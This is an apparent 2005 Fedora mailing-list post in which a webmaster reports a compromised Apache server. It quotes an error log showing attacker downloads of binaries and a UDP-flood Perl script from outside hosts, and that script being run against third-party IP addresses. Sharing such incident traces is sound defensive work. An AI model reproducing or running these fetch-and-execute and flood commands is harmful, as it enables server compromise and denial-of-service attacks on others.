New exploit in Apache and FC3?

Mailing List Receiver mailist at toolz.com
Mon Jun 27 02:09:50 UTC 2005


Ever since we found and stopped a phishing site that had been planted
on our server to run as the default site under Apache, we have been under
constant attack.  Presumably, the perpretrators did not appreciate that
we made their millions of scam emails ineffective.

So, today I just happen to get a feeling that I should check for rootkits.
Sure enough, someone had a listener at port 3049 and lsof showed the owner
as being Apache.  More investigation shows the following in /tmp

-rwxrwxrwx  1 apache apache 34314 Jun 21 08:33 bash-
-rwxrwxrwx  1 apache apache 34346 May  3 17:30 httpp
-rw-r--r--  1 apache apache  1089 Jun 20 16:05 udp-flood.pl
-rw-r--r--  1 apache apache  1089 Jun 20 16:05 udp-flood.pl.1

And the following in the Apache error_log:

Syntax error on line 1194 of /etc/httpd/conf/httpd.conf:
ServerName takes one argument, The hostname and port of the server
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
Dload  Upload   Total   Spent    Left  Speed
100 34346  100 34346    0     0  91094      0 --:--:-- --:--:-- --:--:--  258k
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
Dload  Upload   Total   Spent    Left  Speed
100 34346  100 34346    0     0   143k      0 --:--:-- --:--:-- --:--:--  348k
sh: Aarhus: command not found
--07:49:08--  http://members.cox.net/linuxg0d/bash-
=> `bash-'
Resolving members.cox.net... 68.1.17.8
HTTP request sent, awaiting response... 200 OK
0K .......... .......... .......... ...                  100%  334.35 KB/s
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
Dload  Upload   Total   Spent    Left  Speed
  3 34314    3  1197    0     0   7737      0  0:00:04 --:--:--  0:00:04  7737
curl: (23) Failed writing body
bash-: no process killed
httpp: no process killed
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
Dload  Upload   Total   Spent    Left  Speed
100 34314  100 34314    0     0   100k      0 --:--:-- --:--:-- --:--:--  323k
sh: uname -a: command not found
sh: uname -a: command not found
--14:47:00--  http://members.cox.net/linuxg0d/bash-
=> `bash-.1'
Resolving members.cox.net... 68.1.17.8
HTTP request sent, awaiting response... 200 OK
0K .......... .......... .......... ...                  100%  311.24 KB/s
% Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
Dload  Upload   Total   Spent    Left  Speed
100 34314  100 34314    0     0    97k      0 --:--:-- --:--:-- --:--:--  367k
--22:14:11--  http://coretecsystems.com:4660/udp-flood.pl
=> `udp-flood.pl'
Resolving coretecsystems.com... 68.5.101.205
HTTP request sent, awaiting response... 200 OK
0K .                                                     100%   10.39 MB/s
sh: line 1: 12015 Terminated              perl udp-flood.pl 193.15.190.221 0 0


And then some hours later:

--10:16:10--  http://members.cox.net/linuxg0d/httpp
           => `httpp'
Resolving members.cox.net... 68.1.17.8
Connecting to members.cox.net[68.1.17.8]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34,346 [text/plain]

    0K .......... .......... .......... ...                  100%  290.01 KB/s

10:16:10 (290.01 KB/s) - `httpp' saved [34,346/34,346]

--19:31:24--  http://coretecsystems.com:4660/udp-flood.pl
           => `udp-flood.pl.1'
Resolving coretecsystems.com... 68.5.101.205
Connecting to coretecsystems.com[68.5.101.205]:4660... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,089 [text/plain]

    0K .                                                     100%   10.39 MB/s

19:31:24 (10.39 MB/s) - `udp-flood.pl.1' saved [1,089/1,089]

sh: line 1: 19530 Terminated              perl udp-flood.pl 130.243.43.30 0 0

----------------------------------------------------------------------------
It all appears to reveal that the perps were able to run some kind of 
upload program, although I am not familiar with the output.  And, they are
able to get Apache to execute the upload as if it were CGI.

Oh yeah, and when the perl script, upd-flood.pl fires off, you might as
well just power-down the box!


Todd Merriman
webmaster at eTotalHost.com




More information about the fedora-list mailing list